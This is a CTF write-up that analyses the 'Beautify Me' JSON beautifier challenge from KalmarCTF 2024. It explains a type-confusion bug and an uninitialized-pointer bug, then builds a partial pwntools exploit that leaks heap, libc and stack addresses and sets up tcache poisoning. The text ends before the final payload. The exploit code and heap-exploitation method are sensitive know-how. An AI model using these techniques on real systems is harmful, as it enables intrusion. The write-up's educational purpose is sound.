KalmarCTF 2024

Mar 24, 2024 7516 words 36 minutes

Contents

https://i.imgur.com/JolTISD.png — KalmarCTF 2024

Last week, I played KalmarCTF 2024 with my team, Water Paddler. We managed to take the 8th place. In this writeup, I will be sharing my solution for one of the pwn challenge named Beautify Me.

Pwn

Beautify Me

Description

A JSON beautifier written in beautiful C.

nc chal-kalmarc.tf 2

Initial Analysis

In this challenge, we were provided with the source code of the binary, named main.c and main.h. Let’s start by taking a look at some important functions defined on there.

Analyze main function

main

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


int main () {
    json_t *obj;
    char buf[0x1000];

    setvbuf(stdin, NULL, _IOLBF, 0);
    setvbuf(stdout, NULL, _IOFBF, 0);
    
    while (1) {
        printf("> ");
        fflush(stdout);
        if (fgets(buf, sizeof(buf), stdin) == NULL) exit(-1);
        if (parse_value(buf, &obj) == NULL) {
            printf("Invalid JSON!\n");
            continue;
        }
        print_value(obj, 0);
        printf("\n");
        free_value(obj);
    }
}

Taking a look at the above function, we can deduce that this binary is trying to parse our input, and then it will try to print back our processed input. Deducing from the challenge name, which is “Beautify Me”, seems like the main goal of this binary is it is trying to parse our json input, and then try to pretty print it just like the usual json beautifier.

Let’s try to run the binary, to confirm our deduction.

1
2
3
4
5


╰─❯ ./json_patched
> {"Test":"test"}
{
    "Test": "test"
}

And it is indeed true, that this program try to beautify our json.

Analyze parser function

Now, let’s try to take a deep dive on how the parse_value function works, to verify whether it parse our input correctly or not.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36


char *skip_whitespace(char *s) {
    while (isspace(*s)) s++;
    return s;
}

char *parse_value (char *s, json_t **out) {
    s = skip_whitespace(s);

    if (*s == '{') {
        return parse_object(++s, out);
    } else if (*s == '[') {
        return parse_array(++s, out);
    } else if (*s == '"') {
        char *end = strchr(++s, '"');
        if (end == NULL) return NULL;
        json_t *data = malloc(sizeof(json_t));
        data->type = T_STRING;
        data->string = strndup(s, end-s);
        *out = data;
        return end+1;
    } else if (*s == 't' || *s == 'f') {
        return parse_bool(s, out);
    } else if (*s == 'n') {
        if (strncmp(s, "null", 4) == 0) {
            json_t *data = malloc(sizeof(json_t));
            if (data == NULL) return NULL;
            data->type = T_NULL;
            *out = data;
            return s+4;
        }
    } else if (isdigit(*s) || *s == '-') {
        return parse_number(s, out);
    }

    return NULL;
}

Based on the above initial observation, the parse_value will skip any whitespace first. After that, it will try to call the correct parser function based on the first character of our input. Let’s try to check the parser functions one by one.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81


typedef struct Json {
    union {
        object_t *object;
        array_t *array;
        char *string;
        char boolean;
        long nint;
        double nfloat;
    };
    type_t type;
} json_t;

char *parse_object (char *s, json_t **out) {
    json_t *data = malloc(sizeof(json_t));
    if (data == NULL) return NULL;
    data->type = T_OBJECT;

    s = skip_whitespace(s);

    if (*s == '}') {
        data->object = NULL;
        *out = data;
        return ++s;
    }

    s = parse_object_element(s, &data->object);
    if (s == NULL) {
        free(data);
        return NULL;
    }
    *out = data;
    return s;
}

char *parse_object_element (char *s, object_t **out) {
    object_t *elem = malloc(sizeof(object_t));
    if (elem == NULL) return NULL;

    s = parse_value(s, &elem->key); // Key can be object?
    if (s == NULL) {
        free(elem);
        return NULL;
    }

    s = skip_whitespace(s);

    if (*s != ':') {
        free_value(elem->key);
        free(elem);
        return NULL;
    }

    s = skip_whitespace(++s);

    s = parse_value(s, &elem->value);
    if (s == NULL) {
        free_value(elem->key);
        free(elem);
        return NULL;
    }
    s = skip_whitespace(s);

    if (*s == '}') {
        elem->next = NULL;
        *out = elem;
        return ++s;
    }
    if (*s == ',') {
        s = skip_whitespace(++s);
        s = parse_object_element(s, &elem->next);
        if (s == NULL) {
            free_value(elem->key);
            free_value(elem->value);
            free(elem);
            return NULL;
        }
        *out = elem;
        return s;
    }
    return NULL;
}

So looking at the above function, first, it will allocate a new json_t object named data. Observed that the json_t object size is 0x10, where the first 8 bytes are a union type, which might represent some types, and the last 8 bytes are type_t field, which defined the type of the json input that the program tried to parse.

Next, it will assign T_OBJECT TYPE, skip some whitespaces, and then it will check whether it need to fill data->object or not based on the current character. If it is }, that means the json that it’s trying to parse is an empty object, so it will simply set the object to NULL and return the data. Else, it will call parse_object_element, which is another function that is used to fill in the data->object field.

parse_object_element will start by allocating a new object with type object_t.

1
2
3
4


typedef struct Object {
    object_t *next;
    json_t *key, *value;
} object_t;

Then, the function will try to continue on parsing it, which is divided into three stages:

First, it will try to parse the key from our input, which is marked by having a : character at the end of the input.
Next, it will try to parse the value from our input.
And last, it will check whether our input has more than one pair of key-value or not.
- If it isn’t, it will set the the next as null.
- Else, it will call parse_object_element again (recursive), so that it can assign the next with a pointer to another object.

Observe that the key and value will be parsed with parse_value function, the function that we have discussed before (recursively).

One key observation here that we could see is that, there is one violation that this binary make during parsing the JSON object. The result of the key from the parser function isn’t required to be string in here. It can be any value that has been defined on the binary. Let’s keep this in our mind, so that we can later double check whether this violation is indeed a bug or not.

Now, let’s move to the next functions, which is parse_array.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55


typedef struct Array {
    array_t *next;
    json_t *value;
} array_t;

char *parse_array (char *s, json_t **out) {
    json_t *data = malloc(sizeof(json_t));
    if (data == NULL) return NULL;
    data->type = T_ARRAY;

    s = skip_whitespace(s);

    if (*s == ']') {
        data->array = NULL;
        *out = data;
        return ++s;
    }

    s = parse_array_element(s, &data->array);
    if (s == NULL) {
        free(data);
        return NULL;
    }
    *out = data;
    return s;
}

char *parse_array_element (char *s, array_t **out) {
    array_t *elem = malloc(sizeof(array_t));
    if (elem == NULL) return NULL;
    s = parse_value(s, &elem->value);
    if (s == NULL) {
        free(elem);
        return NULL;
    }

    s = skip_whitespace(s);

    if (*s == ']') {
        elem->next = NULL;
        *out = elem;
        return ++s;
    }
    if (*s == ',') {
        s = skip_whitespace(++s);
        s = parse_array_element(s, &elem->next);
        if (s == NULL) {
            free_value(elem->value);
            free(elem);
            return NULL;
        }
    }
    *out = elem;
    return s;
}

Similar to what the parse_object did, the parse_array function will start by allocating a json_t object named data and set the type to T_ARRAY. Next, it will skip whitespaces, and then proceed to check the next parsed character. If it is ], that means our input is an empty array, so it will set the data->array to null and return it.

Else, it will start parsing our input’s elements by calling parse_array_element. This will allocate a new object array_t named elem, where it will fill elem->value with the result of parse_value (recursive), then check whether it ended with ] or ,. If it is ended with ], it will set the elem->next to null. If it is ended with ,, it will set the elem->next with a pointer to another element produced by the parse_array_element recursive call.

There is one subtle bug here if you noticed. Observed that if the last char is not ] nor ,, instead of returning error, the function will still return the elem, leaving the elem->next uninitialized.

This means, if the elem allocated chunk’s address was used before and it isn’t cleared, the elem->next will still contains residual value from other or previous operations.

Now, there are 3 more parsers functions, which is to parse number, boolean, and null data type. However, I won’t talk about those functions in this writeup because they’re not relevant to the solutions.

Analyze print function

We just discussed on how the parsers function work, not it’s time for us to check the print_value function, which is the main reason why this binary exist.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65


void print_value (json_t *data, int indent) {
    switch (data->type) {
        case T_NULL:
            printf("null");
            break;
        case T_BOOL:
            printf(data->boolean ? "true" : "false");
            break;
        case T_INT:
            printf("%ld", data->nint);
            break;
        case T_FLOAT:
            printf("%lf", data->nfloat);
            break;
        case T_STRING:
            printf("\"%s\"", data->string);
            break;
        case T_ARRAY:
            {
                array_t *curr = data->array;
                if (curr == NULL) {
                    printf("[]");
                    break;
                }
                printf("[\n");
                while (curr) {
                    for (int i = 0; i < indent+4; i++) putchar(' ');
                    print_value(curr->value, indent+4);
                    curr = curr->next;
                    if (curr) {
                        printf(",\n");
                    }
                }
                putchar('\n');
                for (int i = 0; i < indent; i++) putchar(' ');
                printf("]");
            }
            break;
        case T_OBJECT:
            {
                object_t *curr = data->object;
                if (curr == NULL) {
                    printf("{}");
                    break;
                }
                printf("{\n");
                while (curr) {
                    for (int i = 0; i < indent+4; i++) putchar(' ');
                    printf("\"%s\": ", curr->key->string);
                    print_value(curr->value, indent+4);
                    curr = curr->next;
                    if (curr) {
                        printf(",\n");
                    }
                }
                putchar('\n');
                for (int i = 0; i < indent; i++) putchar(' ');
                printf("}");
            }
            break;
        default:
            printf("Invalid type!");
            exit(-1);
    }
}

This pretty print function will try to print data based on the stored data->type. For object and array data type, it will try to recursively print the elements that they have.

Looking at a glance, we might think that this function should be okay. However, there is one subtle bug in here. Take a look at the case where the data->type is T_OBJECT.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22


        case T_OBJECT:
            {
                object_t *curr = data->object;
                if (curr == NULL) {
                    printf("{}");
                    break;
                }
                printf("{\n");
                while (curr) {
                    for (int i = 0; i < indent+4; i++) putchar(' ');
                    printf("\"%s\": ", curr->key->string);
                    print_value(curr->value, indent+4);
                    curr = curr->next;
                    if (curr) {
                        printf(",\n");
                    }
                }
                putchar('\n');
                for (int i = 0; i < indent; i++) putchar(' ');
                printf("}");
            }
            break;

Noticed that when the function try to parse the object, it assumes that the key is a string, so it directly access and print it. However, remember what we have discussed before, where the parse_object is actually allowing the user’s input object’s key not a string type. This means, with this type confusion bug, we might be able to gain some sensitive address leak later.

Next, let’s talk about the free_value function, which is called in main at the end of the loop. Basically, for T_ARRAY and T_OBJECT, the function needs to do more. For example, the T_ARRAYwill try to iterate each of its element stored until the next is null value.

Now that we have reviewed some of the important functions (and find some bugs), it’s time for us to think on how we can leverage this bug further.

Solution

To recap, we have two main bugs so far:

The fact that object’s key in here doesn’t required to be a string, yet the print_value always parse the key as a string, this means we get type confusion bug, which might be able to be used to get some leak.
During constructing array, if the last char is not ] not ,, the array’s next won’t be cleared nor set, which mean the next value will still used just like the old value.

Leaking useful values

In general, we usually start by trying to leak some useful values with the bug. So in this case, we will try to use the first bug, which is a type confusion bug, to leak useful values. Let’s start by making observation in the gdb, to check how the data processed on an object with a valid key. Let say that we send an input {"aaaa":65}, and then set breakpoint at print_value, so that we can inspect the layout of the parsed object in memory (which located in the rdi).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


gef> x/30gx $rdi-0x10
0x55555555c290: 0x0000000000000000      0x0000000000000021
0x55555555c2a0: 0x000055555555c2c0      0x0000000000000006
0x55555555c2b0: 0x0000000000000000      0x0000000000000021
0x55555555c2c0: 0x0000000000000000      0x000055555555c2e0
0x55555555c2d0: 0x000055555555c320      0x0000000000000021
0x55555555c2e0: 0x000055555555c300      0x0000000000000004
0x55555555c2f0: 0x0000000000000000      0x0000000000000021
0x55555555c300: 0x0000000061616161      0x0000000000000000
0x55555555c310: 0x0000000000000000      0x0000000000000021
0x55555555c320: 0x0000000000000041      0x0000000000000002

First chunk is a json_t object, where the first 8 bytes point to the object_t chunk, and the last 8 bytes represent thae json_t type (which is T_OBJECT). Next, taking a look at the object_t chunk, we can see that the first 8 bytes are null, because we only have one pair of key-value. Next 8 bytes points to the key chunk, and last 8 bytes points to the value chunk. The key chunk is actually another json_t chunk, where now, it defined the key as a T_STRING type, and it points to another chunk, which is the string value itself.

Now that we know how the key stored in the memory, let’s try to take a look again at the type confusion bug LOC.

1
2
3
4
5
6
7
8
9


...
        case T_OBJECT:
            {
                object_t *curr = data->object;
                ...
                while (curr) {
                    for (int i = 0; i < indent+4; i++) putchar(' ');
                    printf("\"%s\": ", curr->key->string);
...

Now, let’s try to observe what happen if we set the key as a number data type. Let say that we input {65:65}, let’s check how the object stored in the memory.

1
2
3
4
5
6
7
8
9


gef> x/30gx $rdi-0x10
0x55555555c290: 0x0000000000000000      0x0000000000000021
0x55555555c2a0: 0x000055555555c2c0      0x0000000000000006
0x55555555c2b0: 0x0000000000000000      0x0000000000000021
0x55555555c2c0: 0x0000000000000000      0x000055555555c2e0
0x55555555c2d0: 0x000055555555c300      0x0000000000000021
0x55555555c2e0: 0x0000000000000041      0x0000000000000002
0x55555555c2f0: 0x0000000000000000      0x0000000000000021
0x55555555c300: 0x0000000000000041      0x0000000000000002

Observed that the key chunk type here is T_INT instead of T_STRING, and if you continue the execution, it will crash.

The reason for this crash is because of the type confusion in the print_value function. The LOC curr->key->string will treat the key chunk as a T_STRING type, which is the expectation is that the first 8 bytes are pointer to the actual string. However, because our key type is actually T_INT, and it will store our value in the first 8 bytes instead of storing a pointer, the program will crash because it will try to dereference it.

This crash is a good thing for us, because this mean, if we set our T_INT value to a valid address, print_value will try to dereference our input value and print its content. With this bug, we have a read primitive. If we have a valid address and want to leak its content, we can simply send an object input with our targeted address as the key, and print_value will print its content.

Leaking heap address

However, up until now, we don’t have any leak yet, so how can we know a valid address value? The answer is, let’s try to find other data type, which might give us a leak! Let’s check through the available object type once again.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


typedef struct Json {
    union {
        object_t *object;
        array_t *array;
        char *string;
        char boolean;
        long nint;
        double nfloat;
    };
    type_t type;
} json_t;

typedef struct Array {
    array_t *next;
    json_t *value;
} array_t;

To abuse this type confusion bug, we need to use a data type which contains a pointer to another pointer, so that when we dereference it, the printed value is another pointer address. Looking at the above code, one good type that we can abuse here is array_t. The reason is because array will point to the next array’s element, which mean the printed value will be a heap address. Let’s start making our script, so that we can interact with the binary easier. Below is the initial helper that I defined on the script.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54


from pwn import *

exe = ELF("json_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

context.binary = exe
context.arch = 'amd64'
context.encoding = 'latin'
context.log_level = 'INFO'
warnings.simplefilter("ignore")

remote_url = "chal-kalmarc.tf"
remote_port = 2
gdbscript = '''
'''

def conn():
    if args.LOCAL:
        r = process([exe.path])
        if args.PLT_DEBUG:
            gdb.attach(r, gdbscript=gdbscript)
            pause()
    else:
        r = remote(remote_url, remote_port)

    return r

def demangle(val, is_heap_base=False):
    if not is_heap_base:
        mask = 0xfff << 52
        while mask:
            v = val & mask
            val ^= (v >> 12)
            mask >>= 12
        return val
    return val << 12

def mangle(heap_addr, val):
    return (heap_addr >> 12) ^ val

r = conn()
menu_delim = b'> '
def logbase(): info('libc.address = %#x' % libc.address)
def logleak(name, val):  info(name+' = %#x' % val)
def sa(delim,data): return r.sendafter(delim,data)
def sla(delim,line): return r.sendlineafter(delim,line)
def sl(line): return r.sendline(line)
def so(data): return r.send(data)
def sn(num): return str(num).encode()
def menu(num): return sla(menu_delim, sn(num))

def s_json(payload):
    sla(menu_delim, payload)

Now that our helper is ready, to give a better understanding, let’s try to send {[0,0]:0} to the binary.

1
2


# Heap leak
s_json(b'{[0,0]:0}')

The above script will send {[0,0]:0} input. Before running the above script, as usual, set a breakpoint at the print_value, and inspect its object layout once again.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


gef> x/50gx $rdi-0x10
0x55555555c290: 0x0000000000000000      0x0000000000000021
0x55555555c2a0: 0x000055555555c2c0      0x0000000000000006
0x55555555c2b0: 0x0000000000000000      0x0000000000000021
0x55555555c2c0: 0x0000000000000000      0x000055555555c2e0
0x55555555c2d0: 0x000055555555c380      0x0000000000000021
0x55555555c2e0: 0x000055555555c300      0x0000000000000005
0x55555555c2f0: 0x0000000000000000      0x0000000000000021
0x55555555c300: 0x000055555555c340      0x000055555555c320
0x55555555c310: 0x0000000000000000      0x0000000000000021
0x55555555c320: 0x0000000000000000      0x0000000000000002
0x55555555c330: 0x0000000000000000      0x0000000000000021
0x55555555c340: 0x0000000000000000      0x000055555555c360
0x55555555c350: 0x0000000000000000      0x0000000000000021
0x55555555c360: 0x0000000000000000      0x0000000000000002
0x55555555c370: 0x0000000000000000      0x0000000000000021
0x55555555c380: 0x0000000000000000      0x0000000000000002

The key object is now an Array data type, and when the print_value try to print the key, it will print the array_t->next pointer, which is a heap address. With this, we finally get a leak of known valid address.

1
2
3


r.recvuntil(b'"')
leaked_heap = u64(r.recvuntil(b'"')[:-1].ljust(8, b'\x00'))
logleak('leaked_heap', leaked_heap)

The above script will retrieve the printed key value and store it in our script. Now, we can move to the next step, which is trying to leak libc values.

Leaking libc address

Now that we know a heap address, we need to find a way to get another useful leak values, which is libc address. As usual, the most common way to put a libc address to the heap area is by having an unsorted bin in the heap area. There are many ways to trigger unsorted bin, either you create a string large enough and free it, or you fulfill the tcache bins. For this challenge, I decided to use the second approach, which is to fulfill the tcache bins. Let’s try to extend our script:

1
2
3


# Trigger unsorted bin
a_str = 'a'*0x80
s_json(f'["{a_str}","{a_str}","{a_str}","{a_str}","{a_str}","{a_str}","{a_str}","{a_str}",64]')

We need to add one more element on there to prevent our unsortedbiin chunk consolidate with the top chunk. After we trigger the above script, the free_value function (which is called just before it end the main loop) will fulfill the tcache bins of 0x90 chunk.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20


gef> tcache
...
---------------------------------- Tcache Bins for arena 'main_arena' ----------------------------------
tcachebins[idx=7, size=0x90, @0x55555555c0c8]: fd=0x55555555c7e0 count=7
 -> Chunk(addr = 0x55555555c7d0 , size=0x90, flags=PREV_INUSE, fd=0x55500000924c(=0x55555555c710))
 -> Chunk(addr = 0x55555555c700 , size=0x90, flags=PREV_INUSE, fd=0x55500000931c(=0x55555555c640))
 -> Chunk(addr = 0x55555555c630 , size=0x90, flags=PREV_INUSE, fd=0x55500000902c(=0x55555555c570))
 -> Chunk(addr = 0x55555555c560 , size=0x90, flags=PREV_INUSE, fd=0x55500000919c(=0x55555555c4c0))
 -> Chunk(addr = 0x55555555c4b0 , size=0x90, flags=PREV_INUSE, fd=0x55500000916c(=0x55555555c430))
 -> Chunk(addr = 0x55555555c420 , size=0x90, flags=PREV_INUSE, fd=0x5550000096fc(=0x55555555c3a0))
 -> Chunk(addr = 0x55555555c390 , size=0x90, flags=PREV_INUSE, fd=0x55555555c(=0x000000000000))
...
gef> unsorted
---------------------------------- Unsorted Bin for arena 'main_arena' ----------------------------------
unsorted_bin[idx=0, size=any, @0x7ffff7faccf0]: fd=0x55555555c8a0, bk=0x55555555c8a0
 -> Chunk(addr = 0x55555555c8a0 , size=0x90, flags=PREV_INUSE, fd=0x7ffff7facce0, bk=0x7ffff7facce0)
[+] Found 1 valid chunks in unsorted bin.
gef> x/10gx 0x55555555c8a0
0x55555555c8a0: 0x0000000000000000      0x0000000000000091
0x55555555c8b0: 0x00007ffff7facce0      0x00007ffff7facce0

As you can see, now we have a libc address in the heap. We can easiy leak this value by setting the heap address which point to the libc as the key of our inputted object. Let’s extend our script once again.

1
2
3
4
5
6
7
8


# Libc leak
target = leaked_heap+0x570
s_json(f'{{{target}:0}}')
r.recvuntil(b'"')
leaked_libc = u64(r.recvuntil(b'"')[:-1].ljust(8, b'\x00'))
logleak('leaked_libc', leaked_libc)
libc.address = leaked_libc-(libc.sym.main_arena+96)
logleak('libc.address', libc.address)

Now that we have leaked the libc address, we will leak one more value, because this vaule will be useful later. We will leak the binary stack address, which is stored in the environ of the libc. We just need to repeat a similar step with the above step to leak it.

1
2
3
4
5
6
7
8


# Leak stack
target = libc.sym.environ
s_json(f'{{{target}:0}}')
r.recvuntil(b'"')
leaked_stack = u64(r.recvuntil(b'"')[:-1].ljust(8, b'\x00'))
logleak('leaked_stack', leaked_stack)
buf_stack = leaked_stack-0x1138
logleak('buf_stack', buf_stack)

buf_stack value that I calculate in the above script is the stack address of our raw input in the stack, which is defined as buf in the main.c file.

1
2
3
4
5
6
7
8
9


int main () {
...
    char buf[0x1000];
...
    while (1) {
...
        if (fgets(buf, sizeof(buf), stdin) == NULL) exit(-1);
...
}

I found this calculation by observing the offset of the buf with the stored value in the environ inside the gdb. I will explain why we need the buf address later, but for now, we have leaked all the necessary values to proceed to the next step, which is trying to get remote code execution.

Gaining Remote Code Execution

At this moment, we need to think how to gain remote code execution. So far, we’ve been abusing the type confusion bug that we found during our initial analysis. Now, it’s time to abuse the second bug that we found, which is the uninitialized array_t->next value. To understand this bug better, let’s try to trigger the bug and play around with it. We’ve discussed before that the binary considered [0,0 as a valid JSON due to the bug in parse_array_element function.

Reproducing the `next` bug

For those who still don’t know why this bug can be fatal, let’s try to send two inputs:

The first one is [0,0].
The second one is [0.

If you try to send both of these inputs in sequence, the binary will crash during calling print_value for our second input. If we try to observe this in the gdb, we will notice that the binary try to dereference invalid address.

1
2
3
4
5
6
7
8


 -> 0x555555555ccf 488b4008            <print_value+0x15f>   mov    rax, QWORD PTR [rax + 0x8]
    0x555555555cd3 89d6                <print_value+0x163>   mov    esi, edx
    0x555555555cd5 4889c7              <print_value+0x165>   mov    rdi, rax
    0x555555555cd8 e893feffff          <print_value+0x168>   call   0x555555555b70 <print_value>
    0x555555555cdd 488b45f0            <print_value+0x16d>   mov    rax, QWORD PTR [rbp - 0x10]
    0x555555555ce1 488b00              <print_value+0x171>   mov    rax, QWORD PTR [rax]
----------------------------------------------------------- memory access: $rax+0x8 = 0x555000009684 ----
[!] Cannot access memory at address 0x555000009684

To analyze this further why it’s crashed, let’s observe the second object layout

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


gef> x/30gx 0x55555555c290
0x55555555c290: 0x0000000000000000      0x0000000000000021
0x55555555c2a0: 0x000055555555c300      0x0000000000000005
0x55555555c2b0: 0x0000000000000000      0x0000000000000021
0x55555555c2c0: 0x00005550000097bc      0x76e9d96ee6adc866
0x55555555c2d0: 0x0000000000000000      0x0000000000000021
0x55555555c2e0: 0x000000055555555c      0x76e9d96ee6adc866
0x55555555c2f0: 0x0000000000000000      0x0000000000000021
0x55555555c300: 0x000055500000967c      0x000055555555c320
0x55555555c310: 0x0000000000000000      0x0000000000000021
0x55555555c320: 0x0000000000000000      0x0000000000000002

Observed that the 0x000055555555c300 represent our second input array_t. The last 8 bytes point to the json_t chunk, which is our first array element (0), which is a T_INT type. However, notied that the first 8 bytes of the chunk points to an invalid address, which is 0x000055500000967c. This was caused because we didn’t send the ] char in our second input, which makes the parse_array_element leave the next pointer uninitialized instead of setting it to null. The next value still contains the old value, which is a mangled pointer of the tcache freed chunk. Because the next value is not null, the print_value function will think that our array has a next element, and when it try to dereference it to print the value, of course it will crash because it is invalid address.

Abusing the `next` bug

Now that we know more about the second bug, let’s think what we can do with this bug. One idea that we could ask is “Is it possible for us to purposely craft the uninitialized next value, so that it points to our controlled input?”.

The answer for this is yes. The idea is, observed that if we have a chunk just before the top chunk, and then during calling free to that specific chunk, somehow it will be put at the unsorted bin (either due to its huge size or the tcache for that chunk’s size is already full), the free will consolidate the freed chunk with the top chunk. See the below illustration

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


Before free:
|-----------|
| Chunk A   | <- Let say size is 0x90
|-----------|
| Top Chunk | <- Let say size is 0x2000
|-----------|

After free:
|-----------|
| Top chunk | <- Consolidated, and now top chunk size is 0x2090
|-----------|

What makes it perfect for us is that the consolidated chunk previous value isn’t cleared! This means, if we later allocate a new chunk for the array_t element, and it used this consolidated chunk, the uninitialized value of the array_t->next element will be the value that we set before!

For example, let say that the chunk A that got consolidated with the top chunk values are all 0x41, that means the uninitialized value of the next element (which allocate a new chunk by eating the top chunk) will be 0x4141414141414141.

With this information that the uninitialized next element value can be controlled by us, let’s think the next step. I decided to use this to manipulate the tcache freelist. The idea is I want to control the next element, so that:

print_value won’t crash
free_value will free our controlled fake chunks and put it in the tcache freelist.

This is where we will use the buf_stack address that we’ve leaked before. Noticed that is is very easy for us to construct fake chunks in the stack by abusing the fact that fgets read a huge input and it allows us to put null bytes on it. It’s hard for us to construct fake chunks in the heap, because the copy operations are using strndup, which will stop at null bytes.

Assume that we’re able to set the next value of the array to point to our buf_stack. buf_stack is controlled by us, so we can simply craft fake chunks on there to ensure that our input is a valid array_t objects. Not only that, remember that after print_value is called, free_value will be calle as well, where it will iterate the array (just like what print_value did) and free it. That means, we will have our fake chunks located in the buf_stack to be freed and inserted to the tcache bins.

After doing the above thing, noticed that it is very easy to poison those freed chunks. Everytime we send our raw input, it will be read to the buf_stack, which mean we have full control on poisoning the tcache freed chunks metadata.

To understand better, let’s simulate the idea that I’ve described above. Before extending our script, let’s check the latest freelist state after our last execution (which leaked the important values).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37


gef> bins
---------------------------------- Tcache Bins for arena 'main_arena' ----------------------------------
tcachebins[idx=0, size=0x20, @0x55555555c090]: fd=0x55555555c550 count=7
 -> Chunk(addr = 0x55555555c540 , size=0x20, flags=PREV_INUSE, fd=0x55500000965c(=0x55555555c300))
 -> Chunk(addr = 0x55555555c2f0 , size=0x20, flags=PREV_INUSE, fd=0x55500000967c(=0x55555555c320))
 -> Chunk(addr = 0x55555555c310 , size=0x20, flags=PREV_INUSE, fd=0x55500000961c(=0x55555555c340))
 -> Chunk(addr = 0x55555555c330 , size=0x20, flags=PREV_INUSE, fd=0x55500000963c(=0x55555555c360))
 -> Chunk(addr = 0x55555555c350 , size=0x20, flags=PREV_INUSE, fd=0x5550000096dc(=0x55555555c380))
 -> Chunk(addr = 0x55555555c370 , size=0x20, flags=PREV_INUSE, fd=0x5550000097bc(=0x55555555c2e0))
 -> Chunk(addr = 0x55555555c2d0 , size=0x20, flags=PREV_INUSE, fd=0x55555555c(=0x000000000000))
tcachebins[idx=7, size=0x90, @0x55555555c0c8]: fd=0x55555555c7e0 count=7
 -> Chunk(addr = 0x55555555c7d0 , size=0x90, flags=PREV_INUSE, fd=0x55500000924c(=0x55555555c710))
 -> Chunk(addr = 0x55555555c700 , size=0x90, flags=PREV_INUSE, fd=0x55500000931c(=0x55555555c640))
 -> Chunk(addr = 0x55555555c630 , size=0x90, flags=PREV_INUSE, fd=0x55500000902c(=0x55555555c570))
 -> Chunk(addr = 0x55555555c560 , size=0x90, flags=PREV_INUSE, fd=0x55500000919c(=0x55555555c4c0))
 -> Chunk(addr = 0x55555555c4b0 , size=0x90, flags=PREV_INUSE, fd=0x55500000916c(=0x55555555c430))
 -> Chunk(addr = 0x55555555c420 , size=0x90, flags=PREV_INUSE, fd=0x5550000096fc(=0x55555555c3a0))
 -> Chunk(addr = 0x55555555c390 , size=0x90, flags=PREV_INUSE, fd=0x55555555c(=0x000000000000))
[+] Found 14 valid chunks in tcache.
----------------------------------- Fast Bins for arena 'main_arena' -----------------------------------
fastbins[idx=0, size=0x20, @0x7ffff7facc90]: fd=0x55555555c2b0
 -> Chunk(addr = 0x55555555c2b0 , size=0x20, flags=PREV_INUSE, fd=0x555000009c6c(=0x55555555c930))
 -> Chunk(addr = 0x55555555c930 , size=0x20, flags=, fd=0x555000009c0c(=0x55555555c950))
 -> Chunk(addr = 0x55555555c950 , size=0x20, flags=PREV_INUSE, fd=0x555000009d3c(=0x55555555c860))
 -> Chunk(addr = 0x55555555c860 , size=0x20, flags=PREV_INUSE, fd=0x555000009ddc(=0x55555555c880))
 -> Chunk(addr = 0x55555555c880 , size=0x20, flags=PREV_INUSE, fd=0x5550000092cc(=0x55555555c790))
 -> Chunk(addr = 0x55555555c790 , size=0x20, flags=PREV_INUSE, fd=0x5550000092ec(=0x55555555c7b0))
 -> Chunk(addr = 0x55555555c7b0 , size=0x20, flags=PREV_INUSE, fd=0x55500000939c(=0x55555555c6c0))
 -> Chunk(addr = 0x55555555c6c0 , size=0x20, flags=PREV_INUSE, fd=0x5550000093bc(=0x55555555c6e0))
 -> Chunk(addr = 0x55555555c6e0 , size=0x20, flags=PREV_INUSE, fd=0x5550000090ac(=0x55555555c5f0))
 -> Chunk(addr = 0x55555555c5f0 , size=0x20, flags=PREV_INUSE, fd=0x55500000934c(=0x55555555c610))
 -> Chunk(addr = 0x55555555c610 , size=0x20, flags=PREV_INUSE, fd=0x5550000097cc(=0x55555555c290))
 -> Chunk(addr = 0x55555555c290 , size=0x20, flags=PREV_INUSE, fd=0x55555555c(=0x000000000000))
[+] Found 12 valid chunks in fastbins.
---------------------------------- Unsorted Bin for arena 'main_arena' ----------------------------------
unsorted_bin[idx=0, size=any, @0x7ffff7faccf0]: fd=0x55555555c8a0, bk=0x55555555c8a0
 -> Chunk(addr = 0x55555555c8a0 , size=0x90, flags=PREV_INUSE, fd=0x7ffff7facce0, bk=0x7ffff7facce0)

We have 19 of 0x20 chunks (in tcache and fastbin) and we have 8 0x90 chunks (7 in tcache and 1 in unsortedbin). Now, in order to successfully inject the next pointer, we need to ensure that our chunk which contained our target of next value will be placed just before the top chunk, and its need to have size either larger than the maximum tcache chunk’s size, or have size where the tcache bins are already full.

I decided to go with the second choice, so what I did was similar to our previous step during leaking the libc address. First, we need to allocate 8 string element in the array, where each string has size of 0x80. This will consume all of the 0x90 chunks that we have in the bins. Then, we can simply add one more element with size 0x86, where the last 6 bytes are the value that we’re planning to inject the next with. Let’s extend our script like below.

1
2
3
4
5
6
7


